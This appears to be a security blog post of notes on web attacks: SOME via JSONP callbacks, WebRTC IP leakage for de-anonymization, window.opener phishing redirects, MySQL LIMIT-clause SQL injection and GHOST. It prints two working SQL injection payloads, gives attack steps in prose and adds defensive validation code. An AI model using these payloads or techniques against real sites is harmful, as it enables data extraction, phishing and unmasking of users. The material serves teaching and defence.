Same Origin Method Execution - SOME

This is based on a talk Ben Hayak gave at Black Hat 2014 - EU: Same Origin Method Execution (SOME) - Exploiting a callback for same origin policy bypass.

Unfortunately the presentation doesn't explain it well and I couldn't find a video of it.

Prerequisite - JSONP Recap

Classic JSONP usage lets you name the JavaScript function that the response should call, so the response will be something like igotthepower({"jsonp":"data"}). This is what lets you bypass the Same Origin Policy.

  1. Find a JavaScript function or an interaction on the website that can be triggered by a simple call, i.e. "Do you want to trust this external component?", "Do you want to share this?" etc.
  2. Open a _blank window to the JSONP endpoint (or a similar place that can trigger the JavaScript function). You have to make this wait a bit so that the page in the next step has finished loading when the call is made; you can do this with a small script that waits 3 seconds and then loads the page.
  3. Redirect the current page to the page whose JavaScript function you want to trigger, such as Accept() or Share(), to bypass the user interaction, for example a page that asks for confirmation to "Accept" sharing data or to "Trust" a 3rd party.
  4. Now the current page is the page where you want "Accept" pressed, and the JSONP page calls the function you named, i.e. window.opener.Accept. window.opener is the page you want to bypass, so Accept is called as JavaScript from the same origin, hence no same-origin issue, and voila!

You need to be aware that the JSONP result has to be loaded via <script> tags and the Content-Type has to be a JavaScript-executable type; neither is a common design or behaviour. Bottom line: this is very hard to exploit in the real world, but it's quite interesting nonetheless.
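The point that makes SOME possible is that the endpoint echoes whatever callback name it is given, so a request can name a method on another window. As an added example (not code from the original post or from Ben Hayak's talk), here is the check a JSONP endpoint should apply on the server: the callback must be a single plain identifier, which can only ever refer to a global function on the page that included the script. Function names, the headers object and the sample inputs are constructed for this illustration.

```javascript
// Added example, not from the original post: server-side validation of a
// JSONP callback name so that a request cannot name a method of another
// window such as window.opener.Accept. Names below are constructed.

// A callback must be one JavaScript identifier: no dots, brackets, parentheses
// or whitespace. That rules out property paths (window.opener.Accept) and
// any attempt to smuggle code into the response.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]{0,63}$/;

function isSafeJsonpCallback(name) {
  return typeof name === 'string' && CALLBACK_RE.test(name);
}

// Builds the JSONP response body, or null when the callback is rejected.
// The caller should answer 400 in that case rather than echo the name back.
function buildJsonpResponse(callbackName, payload) {
  if (!isSafeJsonpCallback(callbackName)) return null;
  // JSON.stringify output is safe to embed in a script body; escaping
  // U+2028/U+2029 avoids raw line terminators inside the literal on older engines.
  const json = JSON.stringify(payload)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  // The typeof guard stops a ReferenceError if the page never defined the callback.
  return `/**/ typeof ${callbackName} === 'function' && ${callbackName}(${json});`;
}

// Headers to send with the body above. nosniff stops browsers from treating a
// non-script response as script, which is the property the technique relies on.
const JSONP_HEADERS = {
  'Content-Type': 'application/javascript; charset=utf-8',
  'X-Content-Type-Options': 'nosniff',
};

// Constructed sample inputs: the ordinary case and the SOME-style callback name.
const GOOD = buildJsonpResponse('igotthepower', { jsonp: 'data' });
const BAD = buildJsonpResponse('window.opener.Accept', { jsonp: 'data' });

module.exports = { isSafeJsonpCallback, buildJsonpResponse, JSONP_HEADERS, GOOD, BAD };
```

Rejecting anything with a dot is the whole mitigation: without a property path the response can only call a function the including page itself defines, and the opener window is never reachable.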

Sample code for your lab:

Getting Public & Private IP Address with WebRTC

Apparently with WebRTC it's quite easy to get the internal and external IP address(es) of a user. Code and more details.

This obviously can be used to bypass proxies etc., so it can come in quite useful to de-anonymize someone or to help launch a more precise attack against an internal IP address, i.e. CSRF against the user's router. You can easily find the subnet using this trick and launch the attack in a more precise manner.

Couple of notes:

  1. This is by design and won't be fixed anytime soon (at least in Chrome).
  2. It's a feature used for P2P connections with WebRTC.
  3. You can disable STUN requests in Firefox; there is no way to do it in Chrome.
  4. The Tor Bundle doesn't come with WebRTC, so the Tor Bundle is not affected by it.
  5. STUN requests to find the public IP address are UDP requests, so if you are using a personal process-level firewall

Window.opener.location - Phishing and stuff...

window.opener.location can be overwritten from another origin. I have no idea why: you cannot read it, and you cannot read or write pretty much anything else, but you can overwrite location (if anyone knows why, I would love to learn).

So if a site links to a website you control in a _blank window, you can set window.opener.location = '' and redirect the user's original window to your website. In theory you can just replicate the original website, and when the user goes back to that window he won't notice that the URL changed and will carry on and enter his login etc.
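The fix on the linking site is rel="noopener" (with "noreferrer" for older browsers), which gives the opened page no window.opener to write to. As an added example that is not part of the original post, here is a small rewrite pass over an HTML fragment that adds those rel tokens to every target="_blank" anchor; it is regex-based and meant for simple server-rendered fragments or a template lint, and its function names and sample fragment are constructed for this illustration.

```javascript
// Added example, not from the original post: give every target="_blank"
// anchor rel="noopener noreferrer" so the opened page receives a null
// window.opener and cannot reassign window.opener.location.
// Regex-based; fine for simple fragments, not a general HTML parser.

const ANCHOR_RE = /<a\b[^>]*>/gi;

function hardenAnchor(tag) {
  // Only anchors that open a new browsing context hand out window.opener.
  if (!/\btarget\s*=\s*["']?_blank["']?/i.test(tag)) return tag;

  const relMatch = tag.match(/\brel\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i);
  if (relMatch) {
    // Merge with existing tokens (e.g. nofollow) instead of clobbering them.
    const raw = relMatch[1] ?? relMatch[2] ?? relMatch[3];
    const tokens = raw.split(/\s+/).filter(Boolean);
    for (const t of ['noopener', 'noreferrer']) {
      if (!tokens.some((x) => x.toLowerCase() === t)) tokens.push(t);
    }
    return tag.replace(relMatch[0], `rel="${tokens.join(' ')}"`);
  }
  // No rel attribute: insert one before the closing '>' (also handles '<a ... />').
  return tag.replace(/\s*\/?>$/, (end) => ` rel="noopener noreferrer"${end.trim()}`);
}

function addNoopener(html) {
  return html.replace(ANCHOR_RE, hardenAnchor);
}

// Constructed sample fragment: one external _blank link without rel, one
// internal link, and one _blank link that already carries rel="nofollow".
const SAMPLE =
  '<p><a href="https://example.com/" target="_blank">external</a> ' +
  '<a href="/local">internal</a> ' +
  '<a target="_blank" rel="nofollow" href="https://example.org/">more</a></p>';

module.exports = { hardenAnchor, addNoopener, SAMPLE };
```

Two notes on the design: the pass is idempotent (running it twice changes nothing), and current browsers already imply noopener for target="_blank" links, so this mainly matters for older clients and for pages opened with window.open(), where the 'noopener' window feature or setting window.opener = null in the opened page does the same job.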

SQL Injections in MySQL LIMIT clause

Here is a sample:
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

Quite neat and straightforward. If you need time-based SQL injection then you'll need to use the old-school BENCHMARK(); apparently sleep() doesn't work here:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
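The reason this clause is such a common injection point is that the offset and count are often interpolated straight into the statement, because some drivers cannot bind them as placeholders. As an added example, not from the original post or the linked write-up, here is the input validation to apply before either value reaches the query string, with the page's own payload used as a constructed negative test; the function names and the application limits are assumptions for this illustration.

```javascript
// Added example, not from the original post: strict validation of LIMIT
// offset/count taken from a request, so that text such as
// "1,1 procedure analyse(...)" never reaches the statement.
// Limits and function names are constructed for this illustration.

const MAX_PAGE_SIZE = 100;     // hypothetical application limit
const MAX_OFFSET = 1000000;    // hypothetical application limit

// Accepts a string or number and returns a non-negative integer, or throws.
// A strict pattern is used instead of parseInt(), because parseInt silently
// truncates "1 procedure analyse(...)" to 1 and would let the check pass.
function toBoundedInt(value, max, name) {
  const s = String(value).trim();
  if (!/^\d{1,9}$/.test(s)) {
    throw new RangeError(`${name} must be a non-negative integer, got ${JSON.stringify(s)}`);
  }
  const n = Number(s);
  if (n > max) throw new RangeError(`${name} exceeds ${max}`);
  return n;
}

function buildLimitClause(offset, count) {
  const o = toBoundedInt(offset, MAX_OFFSET, 'offset');
  const c = toBoundedInt(count, MAX_PAGE_SIZE, 'count');
  if (c === 0) throw new RangeError('count must be at least 1');
  return `LIMIT ${o},${c}`;
}

// Full statement for the page's example table; only the two validated
// integers are ever interpolated.
function buildQuery(offset, count) {
  return `SELECT field FROM user WHERE id > 0 ORDER BY id ${buildLimitClause(offset, count)}`;
}

// True when the pair would be rejected; useful for logging rejected requests.
function isRejected(offset, count) {
  try {
    buildLimitClause(offset, count);
    return false;
  } catch (e) {
    return e instanceof RangeError;
  }
}

module.exports = { toBoundedInt, buildLimitClause, buildQuery, isRejected };
```

Where the driver uses real server-side prepared statements, LIMIT ?, ? binds fine and is preferable; the integer check above is for the string-built and emulated-prepare cases, and it doubles as a cheap detection point, since a rejected offset or count is almost always an injection attempt worth logging.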

Server-side Request Forgery Attacks Cheatsheet / Guide

A very neat guide covering from basics to advanced SSRF attacks.

GHOST and Web Applications

Following the recent trend of "hip vulnerability names & logos" in the industry, Qualys PR did a good job with GHOST. Not to undermine the vulnerability, but we haven't seen much impact from it just yet and many think we won't see much in the future. Even though Michal Zalewski's Technical analysis of Qualys' GHOST is making fun of the PR, there are some truly interesting points in that post, such as:

The image file modification date returned by the HTTP server at is Thu, 02 Oct 2014 02:40:27 GMT (Last-Modified, link). The roughly 90-day delay between the creation of the image and the release of the advisory probably corresponds to the industry-standard period needed to test the materials with appropriate focus groups.

Spiderlabs (a bunch of smart guys in my experience) went after the obvious victim, PHP, and noticed that the Wordpress Pingback feature can be used for testing GHOST.

This PoC allows users to remotely verify if a target web server is vulnerable to the CVE however it does not demonstrate exploitability.

So they managed to get a memory corruption, but no one expects to exploit it yet.